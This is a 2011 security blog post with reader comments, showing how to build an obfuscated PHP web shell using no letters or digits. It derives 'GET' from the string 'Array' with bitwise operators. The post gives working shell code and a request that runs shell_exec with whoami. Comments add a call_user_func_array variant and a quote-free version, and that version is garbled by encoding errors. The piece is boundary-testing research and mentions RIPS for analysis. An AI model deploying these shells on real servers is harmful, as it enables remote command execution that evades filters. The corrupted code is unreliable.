Non alphanumeric code in PHP
Thursday, 22 September 2011
So a small php shell was tweeted around and it inspired me to investigate a way to execute non-alphanumeric code. First off I started with the idea of using octal escapes in PHP and constructing the escape so for example: \107 is “G” if I could construct the “107” and add the backslash to the beginning maybe I could construct “G”. It worked like this:
$_=+"";
$_=(++$_)+(++$_)+(++$_)+(++$_);
$__=+"";
$__++;
$___=$_*$_+$__+$__+$__+$__+$__+$__+$__;//107
$___="\\$___";
But there was no way to evaluate the escape once it was constructed without using alphanum chars. So I was stumped.
Then I had a brain wave, php automatically does a string conversion for arrays and converts them to “Array” when accessed as a string. I had “A”, “r”, “r” etc but I really needed “GET” in order to create a nice small non-alpha shell.
Onto the second technique, PHP allows you to use bitwise operators on strings 😀
'a'|'b';//c!
We can make new characters by combining others, but I only had a limited set to work with. A simple for loop later I combined the characters to create “GET” and thus make our non-alphanum small PHP shell 😀
<?
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"0x06").($_[+""]|"0x05").($_[+""]^"0x15");
?>
<?=${'_'.$_}['_'](${'_'.$_}['__']);?>
The first part converts a string into an array by attempting to assign to “0” position of the string. Then I make sure the array is a string. Then I use “A” from array with bitwise operators to construct “G”, “E” and “T” using the characters “A”|0x6, “A”|0x5 and “A^0x15”. There you have it,you could even generate non-alpha code without using GET quite easily by producing different characters until you get an eval method.
To call the shell you’d use:
?_=shell_exec&__=whoami
Don’t forget in order to analyze php code use RIPS if you ever encounter this in the wild.
No. 1 — September 22nd, 2011 at 3:30 pm
Nice techniques! To add, if you wish to call a function with multiple argument you could use
With
“?_=call_user_func_array&__=shell_exec&___[0]=whoami”
Cheers! 🙂
No. 2 — September 22nd, 2011 at 3:35 pm
Stefan Esser also commented you can get Array without single quotes @$§[]=$§; and of course you can get underscore as well.
No. 3 — September 22nd, 2011 at 3:56 pm
Woah. Awesome Gareth.
However Mathias code seemed to be filtered out; you can find it here: http://downloads.ackack.net/heyes_technique_multi.txt
No. 4 — September 22nd, 2011 at 4:03 pm
Awesome :0
No. 5 — September 22nd, 2011 at 4:13 pm
@Fredrik
You’re missing the first part which requires an Array in order to produce the non-alpha code.
No. 6 — September 22nd, 2011 at 4:18 pm
Woops! I’ll contact Mathias!
No. 7 — September 22nd, 2011 at 4:21 pm
@Gareth
I didn’t include that part because I didn’t change anything in it. You are right, the first part is needed, obviously. My point was only that if you add another variable you don’t have to depend on functions with only one argument, by using call_user_func_array.
No. 8 — September 22nd, 2011 at 4:23 pm
@Mathias
Ah gotcha fair enough!
No. 9 — September 23rd, 2011 at 7:22 pm
Really interesting, but quite scary. Yet another reason to run the httpd inside a jail/chrooted environment with very limited access. 😛
No. 10 — September 24th, 2011 at 11:52 pm
Have to love scripts like this – Why on earth did you build that? BECAUSE I CAN!
I found the way you got GET from ‘A’ fascinating. An excellent read!
No. 11 — September 29th, 2011 at 6:44 am
Great post, it reminded me of jjencode actually.
No. 12 — October 3rd, 2011 at 8:11 pm
Hey Gareth, just found your blog. Great stuff! I wish there were more writers writing about interesting secure coding – this kind of material is hard to find! Subscribed.
No. 13 — October 21st, 2011 at 10:02 am
Another comment. You can strip down the last line by removing all singlequotes and adding an @ for suppressing, since PHP will give you the warning “Notice: Use of undefined constant _ – assumed ‘_’ in […]” and continue to run 🙂
No. 14 — October 21st, 2011 at 10:05 am
@Mathias
I have since improved it and removed all quotes and underscores:
http://hackvertor.co.uk/hvurl/2w
< ?php $§[]=$§;$§=$§.$§;$?=+$§;$?=$?;$?++;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$§[$?]|($§[$?]^);$?=$§[$?];$?=$§[$?]|($§[$?]&â);$?=$§[$?+$?];$?=$?^($?.?);$?=$?.$?.$?;$?=$?($?.$?).$?($?.$?.$?).$?($?.$?.$?).$?($?.$?.$?).$?.$?($?.$?.$?);$?($?($?.$?).$?($?.$?.$?).$?($?.$?.$?).$?($?.$?).$?($?.$?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($?.$?));?>
No. 15 — October 21st, 2011 at 10:37 am
Touché, that’s really cool man!
No. 16 — October 27th, 2011 at 12:34 pm
When I started reading this the first thing I thought about is exploits! Another was security. You could secure your source code using something like this.
No. 17 — October 27th, 2011 at 1:16 pm
@Jim
Secure is the wrong word, obfuscate is more accurate. The code is hard to de-obfuscate but not impossible.
No. 18 — November 21st, 2011 at 4:34 pm
There exists some reasons to use “alphanumeric code” or this is only for “fun”?
No. 19 — November 21st, 2011 at 4:38 pm
“Without testing the boundaries of what is possible we cannot hope to provide adequate defences.”
No. 20 — November 21st, 2011 at 4:46 pm
Thanks for your promptitude.